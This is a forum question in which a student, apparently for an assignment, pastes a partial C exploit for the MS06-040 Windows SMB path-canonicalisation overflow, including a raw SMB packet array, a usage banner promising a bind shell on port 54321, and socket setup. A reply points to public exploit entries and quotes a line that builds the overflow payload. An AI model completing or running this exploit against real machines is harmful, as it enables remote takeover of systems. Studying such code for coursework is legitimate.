# Buffer-Overflow exploit code

Tags: windows, security, buffer-overflow, exploit

```
  [Buffer - overflow exploit code][1]
```

Hi so i'm doing an exploit on the windows 2000 server as part of an assignment and needed a little help. I've attached a screenshot of the exploit code thats in the c document but i dont really understand what this code does and was wondering if someone would explain to me what exactly this hard code does that in the exploit. So far i know that this code provides me with a remote bind shell at port 54321.

```
char peer0_14[] = {
0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, 
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, 
0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, 
0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, 
0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 
0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, 
0x00, 0x00 };


int main(int argc,char **argv)
{

int fd;
int con;
int repbf[20000];

struct sockaddr_in target;


if(argc < 2)
{

printf("Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)\n");
printf("Tested on WindowsXP SP1 EN and got a bindshell on port 54321\n");
printf("Win2k should give a crash in services.exe\n");
printf("I've used the default smbdomain: WORKGROUP\n\n");
printf("Usage: %s <ip>\n",argv[0]);
printf("Example: %s 192.168.1.103\n\n",argv[0]);
printf("Written by: Preddy\n");
printf("RootShell Security Group\n");
printf("www.team-rootshell.com\n");

exit(1);

}

fd = socket(AF_INET,SOCK_STREAM,0);

if(fd < 0)
{

perror("Could not create socket\n");
exit(1);
}

printf("Target: %s\n",argv[1]);

target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(argv[1]);
target.sin_port = htons(PORT);

con = connect(fd,(struct sockaddr_in *)&target,sizeof(target));

if(con < 0)
{

printf("Could not connect\n");
exit(1);
}
```

this is the exploit code
thanks

Answer (score 1):

Since the code you pasted is not a full exploit code and the all datas are in array form, it is hard to understand how the exploit works.

I suggests you to look at below links

https://www.rapid7.com/db/modules/exploit/windows/smb/ms06_040_netapi
https://vulners.com/exploitdb/EDB-ID:2162

i didn't reverse engineered it but it seems to use jmp esp tricks and uses a fixed address for this gadget. maybe i think you should change some offset to fit your os version.

for XP version following line is key for exploit.

`my $path =     $shellcode . (pack('V', $target->[2]) x 16) . "\x00\x00";`